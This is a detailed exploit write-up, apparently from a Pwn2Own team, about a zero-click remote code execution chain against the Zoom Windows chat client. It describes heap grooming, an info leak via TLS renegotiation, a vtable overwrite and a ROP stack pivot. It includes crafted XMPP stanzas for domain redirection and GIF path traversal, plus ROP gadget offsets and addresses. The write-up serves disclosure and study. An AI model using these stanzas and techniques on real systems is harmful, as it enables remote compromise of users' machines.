undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;
  }

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    
    if (iVar5 < 2) {
      logging::LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      log_message(uVar3);
      logging::LogMessage::~LogMessage(local_d0);

      return 1;
    }

    return 1;
  }

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;
  }

  local_20 = iVar2;
  EVP_CIPHER_CTX_reset(iVar2);
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
      log_message(uVar3);
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
        logging::LogMessage::LogMessage
                  (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
        log_message(uVar3);
      }
      goto LAB_101ba758;
    }

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      EVP_CIPHER_CTX_free(iVar2);
      return 0;
    }

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_180,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
      log_message(uVar3);
    }

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  
  logging::LogMessage::~LogMessage(this);
LAB_101ba852:
  EVP_CIPHER_CTX_free(local_20);
  return 0xc;
}

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted external contact request or is currently in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then while handling the same packet used for the overflow. We can not place the buffer first, allocate something else and then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT Heap was what is used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragment Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLL’s, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least of one of them would be handled by the LFH already, completely breaking our exploit. We weren’t very keen on participating with a exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, lets look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLL’s are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLL’s and for the heap.
  • DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLL’s did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.

Not enabling CFG for a dll means two things:

  • Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another library which does use CFG which calls an address in these dlls is always allowed. The valid start location list is not present for these dlls, which means that it allows all addresses in the range of that dll.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLL’s to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then freeing all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks if there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. Common ways would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.

We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>
</presence>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:

"https://marketplacecontent.zoom.us" + image
"https://marketplacecontent.zoom.us" + "example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
"https://marketplacecontent.zoom.usexample.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.

We are still not fully sure why this worked, but it worked. This is one of two additional, low impact bugs we used for our attack and which is also currently fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak was unlikely to consist of entirely printable characters, we couldn’t try to get these included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

  1. Initiate a HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake.
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.

This video illustrates how this works:

In essence, this similar to creating an object, overwriting a length field and reading it. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object which is used during a TLS handshake to verify a MAC of the transcript during a handshake, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
{
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);
    OPENSSL_free(kctx);
}

This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way for defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we need enough objects and overflows to have a chance of success, but also not too many to still allow deallocated TLS1_PRF_PKEY_CTX objects to remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotation, and even if you want to renegotiate thousands of times without ever sending a HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.

The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom, only then the destructor would call some vtable functions.

class FileWrapperImpl : public FileWrapper {
 public:
  FileWrapperImpl();
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

 private:
  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};

Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance we could exit successfully were small. The information leak will have corrupted many objects and heap metadata in the previous phase, which maybe didn’t affect anything yet if those objects are unused, but if we tried to exit could cause a crash due to destructors or freeing.

Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested to add one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With a emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

Hack the planet GIPHY

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user uploaded GIF file instead, we found that we could allow the downloading of arbitrary sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi 1aWl62KifvJ_LDECBM1" size="4322534"/>
  </giphyv2>
</message>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue/../../../file/[file_id]" size="4322534"/>
  </giphyv2>
</message>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we replaced the address of the stack pointer to point to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 
ret

This sequence is misaligned and normally does something else, but for us this could be used to copy an address to data we overwrote (in edi) to the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain stats by calling GetModuleHandleW with as argument the string "kernel32.dll" from our GIF file. Finally, when returning from that function a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
